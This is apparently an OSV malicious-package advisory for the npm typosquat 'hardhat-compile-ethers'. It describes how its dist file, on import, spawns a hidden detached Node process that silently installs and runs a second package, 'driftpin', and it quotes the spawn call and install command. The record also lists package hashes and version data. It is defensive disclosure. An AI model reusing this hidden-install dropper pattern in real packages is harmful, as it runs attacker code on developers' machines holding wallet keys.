{"id":"MAL-2026-6705","summary":"Malicious code in hardhat-compile-ethers (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)\nThe package's main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user's config), it spawns a detached Node child (`spawn(process.execPath, ['-e', code], {detached:true, stdio:'ignore', windowsHide:true})`) that runs a base64-decoded command to silently `npm install driftpin --no-save --silent --no-audit --no-fund`, then `require('driftpin')` and invoke `getPlugin()()`, executing attacker-controlled code in the installer's Node process. Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.\n","modified":"2026-07-01T19:16:50.546845631Z","published":"2026-07-01T18:41:35Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-07-01T19:11:25.632444026Z","sha256":"180936274762437e2311a83f716cbbf9fcaaaef8e194b950bfa28192bfb44bf8","versions":["0.4.7"],"id":"IN-MAL-2026-007865","modified_time":"2026-07-01T18:42:56Z","source":"amazon-inspector"},{"import_time":"2026-07-01T19:11:25.404233578Z","sha256":"2852e841d953072a439342e58a63f91a6f4047c122d337ad57bc4f4adad45f81","modified_time":"2026-07-01T18:42:38Z","id":"IN-MAL-2026-007863","versions":["0.4.10"],"source":"amazon-inspector"},{"modified_time":"2026-07-01T18:41:35Z","sha256":"3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1","import_time":"2026-07-01T19:11:24.475165466Z","id":"IN-MAL-2026-007856","versions":["0.4.12"],"source":"amazon-inspector"},{"modified_time":"2026-07-01T18:42:18Z","sha256":"51a9a1265ba62d0c900be1a70b6fb28386f2e25cc3e31855fc5b3f58530cae47","import_time":"2026-07-01T19:11:25.142169343Z","id":"IN-MAL-2026-007861","versions":["0.4.11"],"source":"amazon-inspector"},{"import_time":"2026-07-01T19:11:25.528163378Z","sha256":"70318ad0a21e7e2e412adfb362788a771ff49831a01481de94c60d7903634f36","versions":["0.4.8"],"id":"IN-MAL-2026-007864","modified_time":"2026-07-01T18:42:46Z","source":"amazon-inspector"},{"import_time":"2026-07-01T19:11:25.775808651Z","sha256":"95bb3eefd23fcfaf7a9da242c86085f6b7d1cda8344a82a8219789beefe60c12","versions":["0.4.6"],"id":"IN-MAL-2026-007866","modified_time":"2026-07-01T18:43:07Z","source":"amazon-inspector"},{"import_time":"2026-07-01T19:11:26.226038725Z","sha256":"a1d54b1992fb2f6fa590ca2b76dd65574a18a0659f43294aa2fdf0588abe4062","versions":["0.4.5"],"id":"IN-MAL-2026-007870","modified_time":"2026-07-01T18:43:43Z","source":"amazon-inspector"},{"import_time":"2026-07-01T19:11:26.129866344Z","sha256":"d572224fcf90c82c0626008128d7a1fd790e480ec4c3b4fa5292eeb3d610bf81","versions":["0.4.4"],"id":"IN-MAL-2026-007869","modified_time":"2026-07-01T18:43:34Z","source":"amazon-inspector"},{"import_time":"2026-07-01T19:11:25.903639151Z","sha256":"dee0fafd7c2ba309f9b3b1ae8f7e4d54c9d82c630bdbaa176044b9e054cf08c9","modified_time":"2026-07-01T18:43:17Z","id":"IN-MAL-2026-007867","versions":["0.4.2"],"source":"amazon-inspector"},{"modified_time":"2026-07-01T18:43:59Z","sha256":"55a890434cfd92fb846ba508acebf110f286a083dc029651ebecb781528e6f39","import_time":"2026-07-01T19:11:26.500370955Z","id":"IN-MAL-2026-007872","versions":["0.4.0"],"source":"amazon-inspector"},{"import_time":"2026-07-01T19:11:26.029254479Z","sha256":"845a969efc54f4b45826b4bd051aa1adea7c2a983ce97e0665e0c7107f4f2ce3","source":"amazon-inspector","id":"IN-MAL-2026-007868","modified_time":"2026-07-01T18:43:25Z","versions":["0.4.3"]},{"import_time":"2026-07-01T19:11:26.358013817Z","sha256":"c807ea26446e2a048c154c7a3c035c22db3c42ceede57a307195256a3f11e540","versions":["0.0.1"],"id":"IN-MAL-2026-007871","modified_time":"2026-07-01T18:43:50Z","source":"amazon-inspector"},{"modified_time":"2026-07-01T18:42:31Z","sha256":"d1e4d2af59e7b9e792f78d9335e437080b45295155a778e9d336e23f809e325f","import_time":"2026-07-01T19:11:25.289124822Z","id":"IN-MAL-2026-007862","versions":["0.4.9"],"source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.10"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.12"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.11"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.9"}],"affected":[{"package":{"name":"hardhat-compile-ethers","ecosystem":"npm","purl":"pkg:npm/hardhat-compile-ethers"},"versions":["0.4.7","0.4.10","0.4.12","0.4.11","0.4.8","0.4.6","0.4.5","0.4.4","0.4.2","0.4.0","0.4.3","0.0.1","0.4.9"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha1":"e718d781b11897329c9747c5fd57a1677ea24110","sha512_sri":"sha512-jZX1Kng+W6pbRo0AaYeOa9T9Pw2I3jfP4IS+VPjc2btcfG4qr4IH9o6J352wbyVbVrWO0XDDpb8FfJTaADBneg=="},"filename":"hardhat-compile-ethers-0.4.7.tgz"}],"evidence_files":[{"tlsh":"e751e2a32797a1302b370fadcb0b1c5663a352932ad891a0f7ed95121f8218951b39c9","path":"dist/src/index.js","sha256":"7de1080e1a3fdcfcedbe49bc8d587fb856f3bfc06d8bdc1750f40228fcf45f61"},{"tlsh":"41318960cc19cd2307d85595ac7a429361649a470ca6fc2c73a52bbf4f0c2af21b9abd","path":"package.json","sha256":"d5cdd23b692a6e0a213c2a889a398195837f2033e748241c69dee5257beb6dd1"}]},"cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"},{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-compile-ethers/MAL-2026-6705.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}